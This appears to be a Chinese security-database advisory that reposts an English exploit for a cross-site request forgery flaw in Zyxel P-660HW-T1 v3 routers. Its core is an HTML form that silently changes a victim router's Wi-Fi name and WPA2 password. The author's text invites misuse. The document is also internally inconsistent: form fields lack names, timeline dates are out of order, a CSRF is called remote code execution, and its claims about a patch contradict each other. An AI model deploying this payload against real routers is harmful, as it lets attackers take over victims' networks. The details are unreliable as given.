发布日期:2014-05-29
更新日期:2014-05-31
受影响系统:
ZyXEL P-660HW-T1 v3
描述:
--------------------------------------------------------------------------------
Zyxel P-660HW-T1是无线路由器产品。
P-660HW-T1无线路由器版本3的管理面板存在安全漏洞,攻击者可利用此漏洞在受影响设备上执行任意代码。
<*来源:Mustafa ALTINKAYNAK
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Mustafa ALTINKAYNAK ()提供了如下测试方法:
# Exploit Title: Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerabilities
# Date: 05/22/2014
# Author: Mustafa ALTINKAYNAK
# Vendor Homepage:?t=p
# Category: Hardware/Wireless Router
# Tested on: Zyxel P-660HW-T1 v3 Wireless Router
# Patch/ Fix: Vendor has not provided any fix for this yet
---------------------------
Technical Details
---------------------------
This vulnerability was tested at the P-660HW-T1 devices. Admin panel is open you can run remote code destination.
You can send the form below to prepare the target. Please offending. Being partners in crime.
Disclosure Timeline
---------------------------
05/21/2014 Contacted Vendor
05/22/2014 Vendor Replied
04/22/2014 Vulnerability Explained (No reply received)
05/23/2014 Full Disclosure
Exploit Code
---------------------------
Change Wifi (WPA2/PSK) password & SSID by CSRF
---------------------------------------------------------------------------------
<html>
<body>
<form action="http://192.168.1.1/Forms/WLAN_General_1"
method="POST">
<input type="hidden" value="on">
<input type="hidden" value="00000005">
<input type="hidden" value="WIFI NAME">
<input type="hidden" value="00000002">
<input type="hidden" value="0">
<input type="hidden" value="123456">
<input type="hidden" value="1800">
<input type="hidden" value="00000000">
<input type="hidden" value="Uygula">
</form>
</body>
</html>
-----------
Mustafa ALTINKAYNAK
twitter : @m_altinkaynak <https://twitter.com/m_altinkaynak>
建议:
--------------------------------------------------------------------------------
厂商补丁:
ZyXEL
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
?t=p